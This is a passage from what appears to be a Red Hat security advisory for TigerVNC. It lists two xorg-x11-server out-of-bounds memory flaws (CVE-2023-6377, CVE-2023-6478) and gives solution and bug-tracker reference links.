architectures. TigerVNC is a suite of VNC servers and clients.Security Fix(es):* xorg-x11-server: out-of-bounds memory reads/writes in XKB button actions (CVE-2023-6377)* xorg-x11-server: out-of-bounds memory read in RRChangeOutputProperty and RRChangeProviderProperty (CVE-2023-6478)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-6377References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2253291https://bugzilla.redhat.com/show_bug.cgi?id=2253298

Tag

#linux